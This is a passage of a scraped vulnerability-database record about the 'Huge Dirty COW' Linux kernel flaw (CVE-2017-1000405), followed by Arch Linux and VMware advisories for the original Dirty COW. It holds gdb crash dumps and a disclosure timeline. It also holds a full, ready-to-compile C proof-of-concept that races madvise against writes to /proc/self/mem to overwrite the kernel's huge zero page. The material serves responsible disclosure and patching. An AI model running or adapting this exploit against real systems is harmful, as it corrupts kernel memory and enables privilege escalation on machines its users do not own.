In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? () from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in 
eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at 
elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at 
event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 <captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. 
The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "published": "2017-11-30T00:00:00", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n 
lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] 
Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] 
Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "Arch Linux Security Advisory ASA-201610-16\n==========================================\n\nSeverity: High\nDate : 2016-10-24\nCVE-ID : CVE-2016-5195\nPackage : linux-grsec\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-grsec before version 1:4.7.10.r201610222037-1 is\nvulnerable to privilege escalation.\n\nResolution\n==========\n\nUpgrade to 1:4.7.10.r201610222037-1.\n\n# pacman -Syu \"linux-grsec>=1:4.7.10.r201610222037-1\"\n\nThe problem has been fixed upstream in version 4.7.10.r201610222037.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private read-only\nmemory mappings. 
An unprivileged local user could use this flaw to gain\nwrite access to otherwise read-only memory mappings and thus increase\ntheir privileges on the system.\n\nImpact\n======\n\nAn unprivileged local attacker is able to elevate their privileges on\nthe system and gain root access.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\nhttps://access.redhat.com/security/cve/CVE-2016-5195", "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "ASA-201610-16", "href": "https://security.archlinux.org/ASA-201610-16", "type": "archlinux", "title": "[ASA-201610-16] linux-grsec: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**a. Local privilege escalation vulnerability in Linux kernel \n**\n\nThe Linux kernel which ships with the base operating system of VMware Appliances contains a race condition in the way its memory subsystem handles copy-on-write (aka \u201cDirty COW\u201d). Successful exploitation of the vulnerability may allow for local privilege escalation. The product lines listed in this advisory have been confirmed to be affected. VMware product lines that are not affected are documented in VMware [Knowledge Base article 2147515](<https://kb.vmware.com/kb/2147515>). \n\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-5195 to this issue. \n\nColumn 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. 
\n\n", "edition": 7, "modified": "2016-11-22T00:00:00", "published": "2016-11-09T00:00:00", "id": "VMSA-2016-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0018.html", "title": "VMware product updates address local privilege escalation vulnerability in Linux kernel", "type": "vmware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}